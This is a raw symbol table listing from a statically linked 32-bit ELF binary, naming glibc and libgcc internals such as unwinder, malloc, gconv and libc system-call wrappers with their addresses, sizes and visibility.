_Unwind_GetDataRelBase	.symtab	0x80ad470	11	FUNC	<unknown>	HIDDEN	3
_Unwind_GetGR	.symtab	0x80ad520	101	FUNC	<unknown>	HIDDEN	3
_Unwind_GetIP	.symtab	0x80ad430	11	FUNC	<unknown>	HIDDEN	3
_Unwind_GetIPInfo	.symtab	0x80add40	22	FUNC	<unknown>	HIDDEN	3
_Unwind_GetLanguageSpecificData	.symtab	0x80ad450	11	FUNC	<unknown>	HIDDEN	3
_Unwind_GetRegionStart	.symtab	0x80ad460	11	FUNC	<unknown>	HIDDEN	3
_Unwind_GetTextRelBase	.symtab	0x80ad480	11	FUNC	<unknown>	HIDDEN	3
_Unwind_IteratePhdrCallback	.symtab	0x80b0cc0	1309	FUNC	<unknown>	DEFAULT	3
_Unwind_RaiseException	.symtab	0x80af1c0	407	FUNC	<unknown>	HIDDEN	3
_Unwind_RaiseException_Phase2	.symtab	0x80af100	188	FUNC	<unknown>	DEFAULT	3
_Unwind_Resume	.symtab	0x80af570	233	FUNC	<unknown>	HIDDEN	3
_Unwind_Resume_or_Rethrow	.symtab	0x80af470	249	FUNC	<unknown>	HIDDEN	3
_Unwind_SetGR	.symtab	0x80ad4b0	106	FUNC	<unknown>	HIDDEN	3
_Unwind_SetIP	.symtab	0x80ad440	14	FUNC	<unknown>	HIDDEN	3
__CTOR_END__	.symtab	0x80cf084	0	OBJECT	<unknown>	DEFAULT	15
__CTOR_LIST__	.symtab	0x80cf080	0	OBJECT	<unknown>	DEFAULT	15
__DTOR_END__	.symtab	0x80cf090	0	OBJECT	<unknown>	HIDDEN	16
__DTOR_LIST__	.symtab	0x80cf088	0	OBJECT	<unknown>	DEFAULT	16
__EH_FRAME_BEGIN__	.symtab	0x80c7e5c	0	OBJECT	<unknown>	DEFAULT	11
__FRAME_END__	.symtab	0x80cdf4c	0	OBJECT	<unknown>	DEFAULT	11
__JCR_END__	.symtab	0x80cf094	0	OBJECT	<unknown>	DEFAULT	17
__JCR_LIST__	.symtab	0x80cf094	0	OBJECT	<unknown>	DEFAULT	17
____strtod_l_internal	.symtab	0x80a5f00	8404	FUNC	<unknown>	DEFAULT	3
____strtof_l_internal	.symtab	0x80a3cc0	7471	FUNC	<unknown>	DEFAULT	3
____strtol_l_internal	.symtab	0x8056a00	1065	FUNC	<unknown>	DEFAULT	3
____strtold_l_internal	.symtab	0x80a84e0	8391	FUNC	<unknown>	DEFAULT	3
____strtoll_l_internal	.symtab	0x8056e60	1511	FUNC	<unknown>	DEFAULT	3
____strtoul_l_internal	.symtab	0x8078fa0	1026	FUNC	<unknown>	DEFAULT	3
____strtoull_l_internal	.symtab	0x80a3140	1474	FUNC	<unknown>	DEFAULT	3
___asprintf	.symtab	0x80aa7a0	36	FUNC	<unknown>	DEFAULT	3
___brk_addr	.symtab	0x80d59e0	4	OBJECT	<unknown>	DEFAULT	22
___fxstat64	.symtab	0x8068c70	54	FUNC	<unknown>	DEFAULT	3
___newselect_nocancel	.symtab	0x80690ca	45	FUNC	<unknown>	DEFAULT	3
___printf_fp	.symtab	0x807f570	9363	FUNC	<unknown>	DEFAULT	3
___vfprintf_chk	.symtab	0x806b990	234	FUNC	<unknown>	DEFAULT	3
___vfscanf	.symtab	0x809e420	41	FUNC	<unknown>	DEFAULT	3
___xstat64	.symtab	0x8068c30	54	FUNC	<unknown>	DEFAULT	3
__access	.symtab	0x808b4e0	31	FUNC	<unknown>	DEFAULT	3
__add_to_environ	.symtab	0x80559f0	867	FUNC	<unknown>	DEFAULT	3
__after_morecore_hook	.symtab	0x80d4aa8	4	OBJECT	<unknown>	DEFAULT	22
__alloc_dir	.symtab	0x8067100	227	FUNC	<unknown>	DEFAULT	3
__argz_add_sep	.symtab	0x8086340	150	FUNC	<unknown>	DEFAULT	3
__argz_count	.symtab	0x8086200	53	FUNC	<unknown>	DEFAULT	3
__argz_create_sep	.symtab	0x8086240	175	FUNC	<unknown>	DEFAULT	3
__argz_stringify	.symtab	0x80862f0	76	FUNC	<unknown>	DEFAULT	3
__asprintf	.symtab	0x80aa7a0	36	FUNC	<unknown>	DEFAULT	3
__atomic_writev_replacement	.symtab	0x808b770	345	FUNC	<unknown>	DEFAULT	3
__backtrace	.symtab	0x806b650	211	FUNC	<unknown>	DEFAULT	3
__backtrace_symbols_fd	.symtab	0x806b7b0	465	FUNC	<unknown>	DEFAULT	3
__brk	.symtab	0x808b730	56	FUNC	<unknown>	DEFAULT	3
__bsd_signal	.symtab	0x8055350	201	FUNC	<unknown>	DEFAULT	3
__bss_start	.symtab	0x80cfc20	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__calloc	.symtab	0x8063930	842	FUNC	<unknown>	DEFAULT	3
__cfree	.symtab	0x8065270	410	FUNC	<unknown>	DEFAULT	3
__chdir	.symtab	0x808b520	27	FUNC	<unknown>	DEFAULT	3
__clearenv	.symtab	0x8055890	112	FUNC	<unknown>	DEFAULT	3
__clone	.symtab	0x806ac00	119	FUNC	<unknown>	DEFAULT	3
__close	.symtab	0x8053a20	80	FUNC	<unknown>	DEFAULT	3
__close_nocancel	.symtab	0x8053a2a	27	FUNC	<unknown>	DEFAULT	3
__closedir	.symtab	0x80672d0	67	FUNC	<unknown>	DEFAULT	3
__connect	.symtab	0x8053b80	87	FUNC	<unknown>	DEFAULT	3
__connect_internal	.symtab	0x8053b80	87	FUNC	<unknown>	DEFAULT	3
__correctly_grouped_prefixmb	.symtab	0x8057a70	589	FUNC	<unknown>	DEFAULT	3
__ctype_b_loc	.symtab	0x80551b0	50	FUNC	<unknown>	DEFAULT	3
__ctype_tolower_loc	.symtab	0x8055130	50	FUNC	<unknown>	DEFAULT	3
__ctype_toupper_loc	.symtab	0x8055170	50	FUNC	<unknown>	DEFAULT	3
__curbrk	.symtab	0x80d59e0	4	OBJECT	<unknown>	DEFAULT	22
__current_locale_name	.symtab	0x80a30a0	27	FUNC	<unknown>	DEFAULT	3
__cxa_atexit	.symtab	0x8056070	311	FUNC	<unknown>	DEFAULT	3
__data_start	.symtab	0x80cf0e0	0	NOTYPE	<unknown>	DEFAULT	21
__daylight	.symtab	0x80d5940	4	OBJECT	<unknown>	DEFAULT	22
__dcgettext	.symtab	0x8094f90	57	FUNC	<unknown>	DEFAULT	3
__dcigettext	.symtab	0x8095c10	1962	FUNC	<unknown>	DEFAULT	3
__deallocate_stack	.symtab	0x8051270	325	FUNC	<unknown>	DEFAULT	3
__default_morecore	.symtab	0x8065df0	34	FUNC	<unknown>	DEFAULT	3
__default_stacksize	.symtab	0x80cf46c	4	OBJECT	<unknown>	DEFAULT	21
__deregister_frame	.symtab	0x80b07e0	49	FUNC	<unknown>	HIDDEN	3
__deregister_frame_info	.symtab	0x80b07c0	19	FUNC	<unknown>	HIDDEN	3
__deregister_frame_info_bases	.symtab	0x80b06d0	233	FUNC	<unknown>	HIDDEN	3
__dl_iterate_phdr	.symtab	0x80b1630	239	FUNC	<unknown>	DEFAULT	3
__dladdr	.symtab	0x809ea70	31	FUNC	<unknown>	DEFAULT	3
__dladdr1	.symtab	0x809ea90	86	FUNC	<unknown>	DEFAULT	3
__dlclose	.symtab	0x80aaa40	25	FUNC	<unknown>	DEFAULT	3
__dlerror	.symtab	0x809e5f0	535	FUNC	<unknown>	DEFAULT	3
__dlinfo	.symtab	0x809eaf0	52	FUNC	<unknown>	DEFAULT	3
__dlmopen	.symtab	0x809ebf0	78	FUNC	<unknown>	DEFAULT	3
__dlopen	.symtab	0x80aa940	72	FUNC	<unknown>	DEFAULT	3
__dlsym	.symtab	0x80aaa70	96	FUNC	<unknown>	DEFAULT	3
__dlvsym	.symtab	0x80aaaf0	102	FUNC	<unknown>	DEFAULT	3
__do_global_ctors_aux	.symtab	0x80b1810	0	FUNC	<unknown>	DEFAULT	3
__do_global_dtors_aux	.symtab	0x8048160	0	FUNC	<unknown>	DEFAULT	3
__dprintf	.symtab	0x80832b0	36	FUNC	<unknown>	DEFAULT	3
__dso_handle	.symtab	0x80b2a68	0	OBJECT	<unknown>	HIDDEN	7
__dup2	.symtab	0x808b500	31	FUNC	<unknown>	DEFAULT	3
__elf_set___libc_atexit_element__IO_cleanup__	.symtab	0x80c7e50	4	OBJECT	<unknown>	DEFAULT	9
__elf_set___libc_subfreeres_element_buffer_free__	.symtab	0x80c7e24	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7e20	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7e28	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7e2c	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7e30	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7e34	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7e38	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7e3c	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7e44	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7e48	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_free_mem__	.symtab	0x80c7e4c	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_subfreeres_element_res_thread_freeres__	.symtab	0x80c7e40	4	OBJECT	<unknown>	DEFAULT	8
__elf_set___libc_thread_subfreeres_element_arena_thread_freeres__	.symtab	0x80c7e54	4	OBJECT	<unknown>	DEFAULT	10
__elf_set___libc_thread_subfreeres_element_res_thread_freeres__	.symtab	0x80c7e58	4	OBJECT	<unknown>	DEFAULT	10
__environ	.symtab	0x80d4f94	4	OBJECT	<unknown>	DEFAULT	22
__errno_location	.symtab	0x80541e0	17	FUNC	<unknown>	DEFAULT	3
__execve	.symtab	0x8067990	57	FUNC	<unknown>	DEFAULT	3
__exit_funcs	.symtab	0x80cf474	4	OBJECT	<unknown>	DEFAULT	21
__exit_thread	.symtab	0x8068b50	26	FUNC	<unknown>	DEFAULT	3
__fcloseall	.symtab	0x8059a10	9	FUNC	<unknown>	DEFAULT	3
__fcntl	.symtab	0x8053ac0	177	FUNC	<unknown>	DEFAULT	3
__fcntl_nocancel	.symtab	0x8053a70	69	FUNC	<unknown>	DEFAULT	3
__find_in_stack_list	.symtab	0x8050840	131	FUNC	<unknown>	DEFAULT	3
__find_specmb	.symtab	0x8083350	117	FUNC	<unknown>	DEFAULT	3
__fini_array_end	.symtab	0x80cf080	0	NOTYPE	<unknown>	HIDDEN	14
__fini_array_start	.symtab	0x80cf080	0	NOTYPE	<unknown>	HIDDEN	14
__fopen_internal	.symtab	0x8058110	218	FUNC	<unknown>	DEFAULT	3
__fopen_maybe_mmap	.symtab	0x80580d0	63	FUNC	<unknown>	DEFAULT	3
__fork	.symtab	0x80541d0	9	FUNC	<unknown>	DEFAULT	3
__fork_generation	.symtab	0x80d60dc	4	OBJECT	<unknown>	DEFAULT	22
__fork_generation_pointer	.symtab	0x80d61a8	4	OBJECT	<unknown>	DEFAULT	22
__fork_handlers	.symtab	0x80d61ac	4	OBJECT	<unknown>	DEFAULT	22
__fork_lock	.symtab	0x80d5040	4	OBJECT	<unknown>	DEFAULT	22
__fprintf	.symtab	0x8083280	36	FUNC	<unknown>	DEFAULT	3
__fpu_control	.symtab	0x80cfbb8	2	OBJECT	<unknown>	DEFAULT	21
__frame_state_for	.symtab	0x80ae1e0	298	FUNC	<unknown>	HIDDEN	3
__free	.symtab	0x8065270	410	FUNC	<unknown>	DEFAULT	3
__free_hook	.symtab	0x80d4aa4	4	OBJECT	<unknown>	DEFAULT	22
__free_stack_cache	.symtab	0x80509f0	157	FUNC	<unknown>	DEFAULT	3
__free_tcb	.symtab	0x80513c0	70	FUNC	<unknown>	DEFAULT	3
__fsetlocking	.symtab	0x8085c30	56	FUNC	<unknown>	DEFAULT	3
__funlockfile	.symtab	0x8083310	47	FUNC	<unknown>	DEFAULT	3
__fxstat64	.symtab	0x8068c70	54	FUNC	<unknown>	DEFAULT	3
__gcc_personality_v0	.symtab	0x80b1400	538	FUNC	<unknown>	HIDDEN	3
__gconv	.symtab	0x80a2f30	354	FUNC	<unknown>	DEFAULT	3
__gconv_alias_compare	.symtab	0x806cbf0	25	FUNC	<unknown>	DEFAULT	3
__gconv_alias_db	.symtab	0x80d6278	4	OBJECT	<unknown>	DEFAULT	22
__gconv_btwoc_ascii	.symtab	0x806e780	17	FUNC	<unknown>	DEFAULT	3
__gconv_close	.symtab	0x80947e0	145	FUNC	<unknown>	DEFAULT	3
__gconv_close_transform	.symtab	0x806cd50	181	FUNC	<unknown>	DEFAULT	3
__gconv_compare_alias	.symtab	0x806cc70	219	FUNC	<unknown>	DEFAULT	3
__gconv_compare_alias_cache	.symtab	0x8073130	413	FUNC	<unknown>	DEFAULT	3
__gconv_find_shlib	.symtab	0x8073850	397	FUNC	<unknown>	DEFAULT	3
__gconv_find_transform	.symtab	0x806d700	564	FUNC	<unknown>	DEFAULT	3
__gconv_get_alias_db	.symtab	0x806cb90	10	FUNC	<unknown>	DEFAULT	3
__gconv_get_builtin_trans	.symtab	0x806e5b0	450	FUNC	<unknown>	DEFAULT	3
__gconv_get_cache	.symtab	0x8072e30	10	FUNC	<unknown>	DEFAULT	3
__gconv_get_modules_db	.symtab	0x806cb80	10	FUNC	<unknown>	DEFAULT	3
__gconv_get_path	.symtab	0x806de80	730	FUNC	<unknown>	DEFAULT	3
__gconv_load_cache	.symtab	0x8072f50	479	FUNC	<unknown>	DEFAULT	3
__gconv_lock	.symtab	0x80d6274	4	OBJECT	<unknown>	DEFAULT	22
__gconv_lookup_cache	.symtab	0x80732d0	1216	FUNC	<unknown>	DEFAULT	3
__gconv_max_path_elem_len	.symtab	0x80d6280	4	OBJECT	<unknown>	DEFAULT	22
__gconv_modules_db	.symtab	0x80d6270	4	OBJECT	<unknown>	DEFAULT	22
__gconv_open	.symtab	0x80a2830	1786	FUNC	<unknown>	DEFAULT	3
__gconv_path_elem	.symtab	0x80d6284	4	OBJECT	<unknown>	DEFAULT	22
__gconv_path_envvar	.symtab	0x80d627c	4	OBJECT	<unknown>	DEFAULT	22
__gconv_read_conf	.symtab	0x806e160	1061	FUNC	<unknown>	DEFAULT	3
__gconv_release_cache	.symtab	0x8072e40	26	FUNC	<unknown>	DEFAULT	3
__gconv_release_shlib	.symtab	0x8073800	34	FUNC	<unknown>	DEFAULT	3
__gconv_release_step	.symtab	0x806cc10	85	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ascii_internal	.symtab	0x806f9b0	891	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ascii	.symtab	0x806f380	1573	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs2	.symtab	0x806e7a0	1688	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs2reverse	.symtab	0x8070190	1693	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs4	.symtab	0x8071220	895	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_ucs4le	.symtab	0x80715a0	879	FUNC	<unknown>	DEFAULT	3
__gconv_transform_internal_utf8	.symtab	0x80725d0	2138	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs2_internal	.symtab	0x806ee40	1343	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs2reverse_internal	.symtab	0x8070830	1374	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs4_internal	.symtab	0x8070d90	1164	FUNC	<unknown>	DEFAULT	3
__gconv_transform_ucs4le_internal	.symtab	0x806fd30	1111	FUNC	<unknown>	DEFAULT	3
__gconv_transform_utf8_internal	.symtab	0x8071910	3253	FUNC	<unknown>	DEFAULT	3
__gconv_translit_find	.symtab	0x8094970	610	FUNC	<unknown>	DEFAULT	3
__gconv_transliterate	.symtab	0x8094c00	873	FUNC	<unknown>	DEFAULT	3
__get_avphys_pages	.symtab	0x806a7f0	14	FUNC	<unknown>	DEFAULT	3
__get_nprocs	.symtab	0x806aa40	323	FUNC	<unknown>	DEFAULT	3
__get_nprocs_conf	.symtab	0x806aa40	323	FUNC	<unknown>	DEFAULT	3
__get_phys_pages	.symtab	0x806a800	14	FUNC	<unknown>	DEFAULT	3
__getclktck	.symtab	0x806ab90	20	FUNC	<unknown>	DEFAULT	3
__getcwd	.symtab	0x808b540	234	FUNC	<unknown>	DEFAULT	3
__getdelim	.symtab	0x8083e00	624	FUNC	<unknown>	DEFAULT	3
__getdents	.symtab	0x80673f0	159	FUNC	<unknown>	DEFAULT	3
__getdtablesize	.symtab	0x8069090	41	FUNC	<unknown>	DEFAULT	3
__getegid	.symtab	0x808b4b0	12	FUNC	<unknown>	DEFAULT	3
__geteuid	.symtab	0x808b490	12	FUNC	<unknown>	DEFAULT	3
__getgid	.symtab	0x808b4a0	12	FUNC	<unknown>	DEFAULT	3
__gethostname	.symtab	0x809fc10	140	FUNC	<unknown>	DEFAULT	3
__getpagesize	.symtab	0x8069070	23	FUNC	<unknown>	DEFAULT	3
__getpid	.symtab	0x8067df0	49	FUNC	<unknown>	DEFAULT	3
__getrlimit	.symtab	0x8068f80	54	FUNC	<unknown>	DEFAULT	3
__getsockname	.symtab	0x806ad50	30	FUNC	<unknown>	DEFAULT	3
__getsockopt	.symtab	0x806ad70	30	FUNC	<unknown>	DEFAULT	3
__gettext_extract_plural	.symtab	0x80785b0	266	FUNC	<unknown>	DEFAULT	3
__gettext_free_exp	.symtab	0x8077a20	523	FUNC	<unknown>	DEFAULT	3
__gettext_germanic_plural	.symtab	0x80c21a8	20	OBJECT	<unknown>	DEFAULT	7
__gettextparse	.symtab	0x8077d20	2186	FUNC	<unknown>	DEFAULT	3
__gettimeofday	.symtab	0x80670e0	31	FUNC	<unknown>	DEFAULT	3
__gettimeofday_internal	.symtab	0x80670e0	31	FUNC	<unknown>	DEFAULT	3
__getuid	.symtab	0x808b480	12	FUNC	<unknown>	DEFAULT	3
__gmon_start__	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__guess_grouping	.symtab	0x807f1f0	76	FUNC	<unknown>	DEFAULT	3
__hash_string	.symtab	0x80786c0	59	FUNC	<unknown>	DEFAULT	3
__i686.get_pc_thunk.bx	.symtab	0x80af76d	0	FUNC	<unknown>	HIDDEN	3
__i686.get_pc_thunk.cx	.symtab	0x80af769	0	FUNC	<unknown>	HIDDEN	3
__inet_aton	.symtab	0x806b1b0	343	FUNC	<unknown>	DEFAULT	3
__init_array_end	.symtab	0x80cf080	0	NOTYPE	<unknown>	HIDDEN	14
__init_array_start	.symtab	0x80cf080	0	NOTYPE	<unknown>	HIDDEN	14
__init_misc	.symtab	0x806abb0	78	FUNC	<unknown>	DEFAULT	3
__init_sched_fifo_prio	.symtab	0x8053ed0	42	FUNC	<unknown>	DEFAULT	3
__initstate	.symtab	0x80562c0	112	FUNC	<unknown>	DEFAULT	3
__initstate_r	.symtab	0x80566d0	545	FUNC	<unknown>	DEFAULT	3
__ioctl	.symtab	0x8069040	33	FUNC	<unknown>	DEFAULT	3
__is_smp	.symtab	0x80d60f0	4	OBJECT	<unknown>	DEFAULT	22
__isatty	.symtab	0x808b630	34	FUNC	<unknown>	DEFAULT	3
__isinf	.symtab	0x8096420	64	FUNC	<unknown>	DEFAULT	3
__isinfl	.symtab	0x8096490	85	FUNC	<unknown>	DEFAULT	3
__isnan	.symtab	0x8096460	39	FUNC	<unknown>	DEFAULT	3
__isnanl	.symtab	0x80964f0	69	FUNC	<unknown>	DEFAULT	3
__kill	.symtab	0x80554b0	31	FUNC	<unknown>	DEFAULT	3
__lchown	.symtab	0x8068cd0	57	FUNC	<unknown>	DEFAULT	3
__libc_alloca_cutoff	.symtab	0x806af60	66	FUNC	<unknown>	DEFAULT	3
__libc_argc	.symtab	0x80d6268	4	OBJECT	<unknown>	DEFAULT	22
__libc_argv	.symtab	0x80d626c	4	OBJECT	<unknown>	DEFAULT	22
__libc_calloc	.symtab	0x8063930	842	FUNC	<unknown>	DEFAULT	3
__libc_check_standard_fds	.symtab	0x8054c20	459	FUNC	<unknown>	DEFAULT	3
__libc_cleanup_routine	.symtab	0x806afb0	27	FUNC	<unknown>	DEFAULT	3
__libc_close	.symtab	0x8053a20	80	FUNC	<unknown>	DEFAULT	3
__libc_connect	.symtab	0x8053b80	87	FUNC	<unknown>	DEFAULT	3
__libc_csu_fini	.symtab	0x8055070	57	FUNC	<unknown>	DEFAULT	3
__libc_csu_init	.symtab	0x80550b0	127	FUNC	<unknown>	DEFAULT	3
__libc_disable_asynccancel	.symtab	0x806afd0	50	FUNC	<unknown>	DEFAULT	3
__libc_dlclose	.symtab	0x8094510	87	FUNC	<unknown>	DEFAULT	3
__libc_dlopen_mode	.symtab	0x8094650	226	FUNC	<unknown>	DEFAULT	3
__libc_dlsym	.symtab	0x8094570	108	FUNC	<unknown>	DEFAULT	3
__libc_dlsym_private	.symtab	0x80945e0	108	FUNC	<unknown>	DEFAULT	3
__libc_enable_asynccancel	.symtab	0x806b010	98	FUNC	<unknown>	DEFAULT	3
__libc_enable_secure	.symtab	0x80cf0a0	4	OBJECT	<unknown>	DEFAULT	18
__libc_enable_secure_decided	.symtab	0x80d6264	4	OBJECT	<unknown>	DEFAULT	22
__libc_errno	.symtab	0x14	4	TLS	<unknown>	DEFAULT	14
__libc_fatal	.symtab	0x8059ce0	42	FUNC	<unknown>	DEFAULT	3
__libc_fcntl	.symtab	0x8053ac0	177	FUNC	<unknown>	DEFAULT	3
__libc_fork	.symtab	0x8067760	535	FUNC	<unknown>	DEFAULT	3
__libc_free	.symtab	0x8065270	410	FUNC	<unknown>	DEFAULT	3
__libc_init_first	.symtab	0x806caf0	133	FUNC	<unknown>	DEFAULT	3
__libc_init_secure	.symtab	0x806ca90	66	FUNC	<unknown>	DEFAULT	3
__libc_longjmp	.symtab	0x80552a0	84	FUNC	<unknown>	DEFAULT	3
__libc_lseek	.symtab	0x8053ca0	33	FUNC	<unknown>	DEFAULT	3
__libc_lseek64	.symtab	0x806aca0	117	FUNC	<unknown>	DEFAULT	3
__libc_mallinfo	.symtab	0x80609b0	353	FUNC	<unknown>	DEFAULT	3
__libc_malloc	.symtab	0x8063c80	442	FUNC	<unknown>	DEFAULT	3
__libc_malloc_initialized	.symtab	0x80cf958	4	OBJECT	<unknown>	DEFAULT	21
__libc_mallopt	.symtab	0x80610a0	356	FUNC	<unknown>	DEFAULT	3
__libc_memalign	.symtab	0x8063e40	467	FUNC	<unknown>	DEFAULT	3
__libc_message	.symtab	0x8059a20	691	FUNC	<unknown>	DEFAULT	3
__libc_multiple_libcs	.symtab	0x80cf9ac	4	OBJECT	<unknown>	DEFAULT	21
__libc_nanosleep	.symtab	0x8067700	87	FUNC	<unknown>	DEFAULT	3
__libc_open	.symtab	0x8053cd0	91	FUNC	<unknown>	DEFAULT	3
__libc_pause	.symtab	0x8053d30	64	FUNC	<unknown>	DEFAULT	3
__libc_pthread_init	.symtab	0x806b180	45	FUNC	<unknown>	DEFAULT	3
__libc_pvalloc	.symtab	0x8063010	469	FUNC	<unknown>	DEFAULT	3
__libc_read	.symtab	0x80539c0	91	FUNC	<unknown>	DEFAULT	3
__libc_realloc	.symtab	0x8065410	1085	FUNC	<unknown>	DEFAULT	3
__libc_recvfrom	.symtab	0x8053be0	87	FUNC	<unknown>	DEFAULT	3
__libc_register_dl_open_hook	.symtab	0x8094740	125	FUNC	<unknown>	DEFAULT	3
__libc_register_dlfcn_hook	.symtab	0x809e500	37	FUNC	<unknown>	DEFAULT	3
__libc_resp	.symtab	0x0	4	TLS	<unknown>	DEFAULT	13
__libc_select	.symtab	0x80690c0	115	FUNC	<unknown>	DEFAULT	3
__libc_send	.symtab	0x806ad90	87	FUNC	<unknown>	DEFAULT	3
__libc_sendto	.symtab	0x8053c40	87	FUNC	<unknown>	DEFAULT	3
__libc_setlocale_lock	.symtab	0x80d5800	32	OBJECT	<unknown>	DEFAULT	22
__libc_setup_tls	.symtab	0x8054e50	505	FUNC	<unknown>	DEFAULT	3
__libc_sigaction	.symtab	0x8054680	298	FUNC	<unknown>	DEFAULT	3
__libc_siglongjmp	.symtab	0x80552a0	84	FUNC	<unknown>	DEFAULT	3
__libc_stack_end	.symtab	0x80cf09c	4	OBJECT	<unknown>	DEFAULT	18
__libc_start_main	.symtab	0x8054900	763	FUNC	<unknown>	DEFAULT	3
__libc_system	.symtab	0x8057980	104	FUNC	<unknown>	DEFAULT	3
__libc_thread_freeres	.symtab	0x80b28d0	33	FUNC	<unknown>	DEFAULT	5
__libc_tsd_CTYPE_B	.symtab	0x18	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_CTYPE_TOLOWER	.symtab	0x20	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_CTYPE_TOUPPER	.symtab	0x1c	4	TLS	<unknown>	DEFAULT	14
__libc_tsd_LOCALE	.symtab	0x8	4	TLS	<unknown>	DEFAULT	13
__libc_tsd_MALLOC	.symtab	0x24	4	TLS	<unknown>	DEFAULT	14
__libc_valloc	.symtab	0x80631f0	467	FUNC	<unknown>	DEFAULT	3
__libc_waitpid	.symtab	0x8053d70	91	FUNC	<unknown>	DEFAULT	3
__libc_write	.symtab	0x8053960	91	FUNC	<unknown>	DEFAULT	3
__libc_writev	.symtab	0x808b8d0	270	FUNC	<unknown>	DEFAULT	3
__libio_codecvt	.symtab	0x80c2d60	120	OBJECT	<unknown>	DEFAULT	7
__libio_translit	.symtab	0x80c2dd8	20	OBJECT	<unknown>	DEFAULT	7
__lll_lock_wait	.symtab	0x8053680	48	FUNC	<unknown>	HIDDEN	3
__lll_lock_wait_private	.symtab	0x8053650	42	FUNC	<unknown>	HIDDEN	3
__lll_robust_lock_wait	.symtab	0x8053830	81	FUNC	<unknown>	HIDDEN	3
__lll_robust_timedlock_wait	.symtab	0x8053890	201	FUNC	<unknown>	HIDDEN	3
__lll_timedlock_wait	.symtab	0x80536b0	173	FUNC	<unknown>	HIDDEN	3
__lll_timedwait_tid	.symtab	0x80537c0	112	FUNC	<unknown>	HIDDEN	3
__lll_unlock_wake	.symtab	0x8053790	43	FUNC	<unknown>	HIDDEN	3
__lll_unlock_wake_private	.symtab	0x8053760	37	FUNC	<unknown>	HIDDEN	3
__llseek	.symtab	0x806aca0	117	FUNC	<unknown>	DEFAULT	3
__localtime_r	.symtab	0x8086d50	34	FUNC	<unknown>	DEFAULT	3
__longjmp	.symtab	0x8055300	43	FUNC	<unknown>	DEFAULT	3
__lseek	.symtab	0x8053ca0	33	FUNC	<unknown>	DEFAULT	3
__lseek64	.symtab	0x806aca0	117	FUNC	<unknown>	DEFAULT	3
__make_stacks_executable	.symtab	0x8051160	257	FUNC	<unknown>	DEFAULT	3
__mallinfo	.symtab	0x80609b0	353	FUNC	<unknown>	DEFAULT	3
__malloc	.symtab	0x8063c80	442	FUNC	<unknown>	DEFAULT	3
__malloc_check_init	.symtab	0x805ff50	121	FUNC	<unknown>	DEFAULT	3
__malloc_get_state	.symtab	0x80640d0	428	FUNC	<unknown>	DEFAULT	3
__malloc_hook	.symtab	0x80cf94c	4	OBJECT	<unknown>	DEFAULT	21
__malloc_initialize_hook	.symtab	0x80d4aa0	4	OBJECT	<unknown>	DEFAULT	22
__malloc_set_state	.symtab	0x8060d10	905	FUNC	<unknown>	DEFAULT	3
__malloc_stats	.symtab	0x8060790	529	FUNC	<unknown>	DEFAULT	3
__malloc_trim	.symtab	0x8060b20	493	FUNC	<unknown>	DEFAULT	3
__malloc_usable_size	.symtab	0x805ef60	52	FUNC	<unknown>	DEFAULT	3
__mallopt	.symtab	0x80610a0	356	FUNC	<unknown>	DEFAULT	3
__mbrlen	.symtab	0x8086450	55	FUNC	<unknown>	DEFAULT	3
__mbrtowc	.symtab	0x8086490	407	FUNC	<unknown>	DEFAULT	3
__mbsnrtowcs	.symtab	0x8086a30	594	FUNC	<unknown>	DEFAULT	3
__memalign	.symtab	0x8063e40	467	FUNC	<unknown>	DEFAULT	3
__memalign_hook	.symtab	0x80cf954	4	OBJECT	<unknown>	DEFAULT	21
__memchr	.symtab	0x80666b0	411	FUNC	<unknown>	DEFAULT	3
__mempcpy	.symtab	0x8066970	68	FUNC	<unknown>	DEFAULT	3
__mkdir	.symtab	0x8068cb0	31	FUNC	<unknown>	DEFAULT	3
__mktime_internal	.symtab	0x809f250	2437	FUNC	<unknown>	DEFAULT	3
__mmap	.symtab	0x8069cf0	67	FUNC	<unknown>	DEFAULT	3
__mmap64	.symtab	0x8069d40	88	FUNC	<unknown>	DEFAULT	3
__mon_yday	.symtab	0x80c7220	52	OBJECT	<unknown>	DEFAULT	7
__morecore	.symtab	0x80cf948	4	OBJECT	<unknown>	DEFAULT	21
__mpn_add_n	.symtab	0x80aa5e0	144	FUNC	<unknown>	DEFAULT	3
__mpn_addmul_1	.symtab	0x80aa670	60	FUNC	<unknown>	DEFAULT	3
__mpn_cmp	.symtab	0x8096ab0	92	FUNC	<unknown>	DEFAULT	3
__mpn_construct_double	.symtab	0x80aa6f0	86	FUNC	<unknown>	DEFAULT	3
__mpn_construct_float	.symtab	0x80aa6b0	49	FUNC	<unknown>	DEFAULT	3
__mpn_construct_long_double	.symtab	0x80aa750	71	FUNC	<unknown>	DEFAULT	3
__mpn_divrem	.symtab	0x8096b10	1112	FUNC	<unknown>	DEFAULT	3
__mpn_extract_double	.symtab	0x8098800	244	FUNC	<unknown>	DEFAULT	3
